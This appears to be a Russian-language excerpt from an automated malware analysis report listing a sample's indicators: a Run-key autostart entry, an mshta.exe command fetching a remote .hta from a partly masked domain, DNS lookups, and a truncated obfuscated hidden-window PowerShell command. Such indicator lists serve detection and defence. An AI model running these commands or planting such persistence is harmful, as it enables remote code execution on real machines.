Техническая информация
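- [<HKCU>\soFtWarE\micRosofT\WiNdOwS\CuRreNTveRsIOn\ruN] 'pma' = 'C:\Users\Public\pma.exe' (запись в ключе автозапуска Run; путь к ключу записан в смешанном регистре, а имена ключей реестра нечувствительны к регистру, поэтому при поиске этой записи сравнивайте путь без учёта регистра)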
- '<SYSTEM32>\mshta.exe' http://ra###seed.com/ed/out-749961712.hta
- 'C:\users\public\pma.exe'
- C:\users\public\pma.exe
- http://ra###seed.com/ed/out-749961712.hta
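- DNS ASK ra###seed.com (DNS-запрос; символы «#» здесь и в других строках — по-видимому, маскировка части доменного имени в источнике, а не часть самого имени)
- DNS ASK k0##a.com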
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted -Window 1 [void] $null;$xbvordlw = Get-Random -Min 3 -Max 4;$dhtfiokxcjw = ([char[]]([char]97..[char]122));$orhguizfkl = -join ($dhtfiokxcjw | Get-Random -Count $x...' (со скрытым окном; командная строка приведена не полностью — в источнике она обрезана на «...»)